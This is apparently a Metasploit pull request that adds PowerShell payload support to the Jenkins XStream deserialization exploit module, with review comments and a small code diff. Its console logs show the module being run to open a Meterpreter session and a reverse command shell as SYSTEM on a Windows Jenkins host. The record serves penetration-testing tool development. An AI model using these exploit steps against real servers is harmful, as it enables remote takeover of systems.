### PR TITLE
Add powershell payload to jenkins_xstream_deserialize module

### PR DESCRIPTION
**Pull request by attackdebris**
Add a powershell payload to the jenkins_xstream_deserialize module

See [Original pull request for Jenkins installation links/instructions](https://github.com/rapid7/metasploit-framework/pull/9183)

## Meterpreter Verification - Targeting Jenkins 1.649 on Windows 10:
```
msf > use exploit/multi/http/jenkins_xstream_deserialize 
msf exploit(multi/http/jenkins_xstream_deserialize) > set target 2
target => 2
msf exploit(multi/http/jenkins_xstream_deserialize) > set RHOST 192.168.1.36
RHOST => 192.168.1.36
msf exploit(multi/http/jenkins_xstream_deserialize) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/http/jenkins_xstream_deserialize) > set LHOST 192.168.1.176 
LHOST => 192.168.1.176
msf exploit(multi/http/jenkins_xstream_deserialize) > exploit
[*] Exploit running as background job 0.
msf exploit(multi/http/jenkins_xstream_deserialize) > 
[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Waiting for exploit to complete...
[*] Sending stage (205891 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.176:4444 -> 192.168.1.36:50204) at 2018-01-16 14:44:28 +0000

msf exploit(multi/http/jenkins_xstream_deserialize) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

## Reverse Shell Verification -  Targeting Jenkins 1.649 on Windows 10:

```
msf exploit(multi/http/jenkins_xstream_deserialize) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf exploit(multi/http/jenkins_xstream_deserialize) > exploit
[*] Exploit running as background job 1.
msf exploit(multi/http/jenkins_xstream_deserialize) > 
[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Waiting for exploit to complete...
[*] Sending stage (336 bytes) to 192.168.1.36
[*] Command shell session 2 opened (192.168.1.176:4444 -> 192.168.1.36:50206) at 2018-01-16 14:46:19 +0000

msf exploit(multi/http/jenkins_xstream_deserialize) > sessions 2
[*] Starting interaction with 2...

Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Jenkins>whoami
whoami
nt authority\system
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Awesome! Thank you. Can you update `struts2_rest_xstream`? I knew it was a quoting issue but didn't have time to finish debugging.

**Comment by wvu-r7** [comment]
Also, it seems like an oversight that I missed `ARCH_CMD` for Windows.

File: modules/exploits/multi/http/jenkins_xstream_deserialize.rb [hunk 1]
```diff
@@ -57,6 +61,8 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
```
Comment (wvu-r7) [inline modules/exploits/multi/http/jenkins_xstream_deserialize.rb]: Did you try setting `WfsDelay`? This is the standard way to increase listener timeout.

**Comment by wvu-r7** [comment]
Actually, I might have already tried `wrap_double_quotes`, since I went through all the options in `cmd_psh_payload`. Don't worry about it - I'll figure it out later. I'd like to add `ARCH_CMD` for Windows if possible, though. Dropping files is no bueno.

**Comment by attackdebris** [comment]
Thanks for the input, I'll take a look at WfsDelay. Agree RE: `ARCH_CMD` needs sorting before this goes anywhere. I'll take a look too, had no joy so far though.

**Comment by wvu-r7** [comment]
Any updates?

**Comment by attackdebris** [comment]
Just revisiting it, having a bit of trouble with timeouts, will have it sorted shortly.

**Comment by attackdebris** [comment]
I think I have this sorted now. `ARCH_CMD` added for windows. I've had no joy with `WfsDelay` so I've had to stick with the delay loop I was already using.

Tested PowerShell (In-Memory), Windows (CMD) & Windows (Dropper) targets on both x86 (Win7) and x64 (Win10) with success.

**Comment by wvu-r7** [comment]
Great, thank you! I'll give this a test and then update `struts2_rest_xstream` accordingly.

**Comment by wvu-r7** [comment]
# Release Notes

This adds PowerShell support to the `exploit/multi/http/jenkins_xstream_deserialize` module.

**Pull request merged**